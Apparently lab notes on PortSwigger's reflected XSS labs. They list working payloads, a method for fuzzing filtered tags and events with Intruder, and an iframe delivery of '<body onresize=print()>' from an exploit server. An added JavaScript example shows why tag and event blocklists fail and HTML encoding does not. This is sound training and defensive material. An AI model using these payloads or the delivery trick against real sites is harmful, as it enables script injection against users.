https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Reflected XSS into HTML context with nothing encoded

<script>alert(1)</script>
<img src=1 onerror=alert(1)>

Reflected XSS into HTML context with most tags and attributes blocked

When we try a standard XSS payload, we get “tag not allowed”.

With Intruder, we fuzz /?search=<§§> with all tags.

We find that body is accepted.

With Intruder, we fuzz /?search=<body+§§=1> with all events.

We find that onresize is accepted.

We can host this payload on our exploit server to call print() in the victim's browser:

GET /?search=<body onresize=print()>
<iframe src="https://0a1000a303b690d5809c6cea00c90049.web-security-academy.net/?search=%3Cbody+onresize=print()%3E" onload=this.style.width='100px'>

Reflected XSS into HTML context with all tags blocked except custom ones

Only custom tags and a few unusual ones are allowed, but all events are accepted.

We chose the tag xss and the event onfocus.
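
Why the tag and event blocklists in the two filtered labs above keep failing, and what fixes the reflection itself: this is an added example, not code from the labs or from PortSwigger. The blocklist contents, the function names and the `<h1>` search page are assumptions made for illustration.

```javascript
// Added example. The blocklist contents below are constructed for illustration;
// they are an assumption, not the lab's actual filter.
const BLOCKED_TAGS = ['script', 'img', 'svg', 'iframe', 'a', 'div'];
const BLOCKED_EVENTS = ['onerror', 'onload', 'onclick', 'onmouseover'];

// Weak control: reject input that names a known-bad tag or event handler.
function blocklistAllows(input) {
  const lower = input.toLowerCase();
  const tagHit = BLOCKED_TAGS.some(t => new RegExp(`<\\s*${t}\\b`).test(lower));
  const eventHit = BLOCKED_EVENTS.some(e => new RegExp(`\\b${e}\\s*=`).test(lower));
  return !(tagHit || eventHit);
}

// Strong control: encode for the HTML text context, so no input can open a tag.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeHtml(input) {
  return String(input).replace(/[&<>"']/g, c => HTML_ENTITIES[c]);
}

// Hypothetical search page that reflects the term inside an <h1>.
function renderSearchResult(term) {
  return `<h1>Results for: ${encodeHtml(term)}</h1>`;
}

// Headers that refuse framing by other origins (the delivery above relies on an iframe).
const RESPONSE_HEADERS = {
  'Content-Security-Policy': "frame-ancestors 'none'",
  'X-Frame-Options': 'DENY',
};

// Inputs from the notes above; the last is the probe form for the custom tag.
const SAMPLES = [
  '<script>alert(1)</script>',
  '<img src=1 onerror=alert(1)>',
  '<body onresize=print()>',
  '<xss onfocus=1>',
];

function evaluateSamples() {
  return SAMPLES.map(s => ({
    input: s,
    passesBlocklist: blocklistAllows(s),
    rendered: renderSearchResult(s),
  }));
}

console.table(evaluateSamples());
```

The last two samples pass the blocklist because nobody listed them, while the encoded output contains no `<` for any input. The framing headers only remove the iframe delivery route; the encoding is what closes the injection.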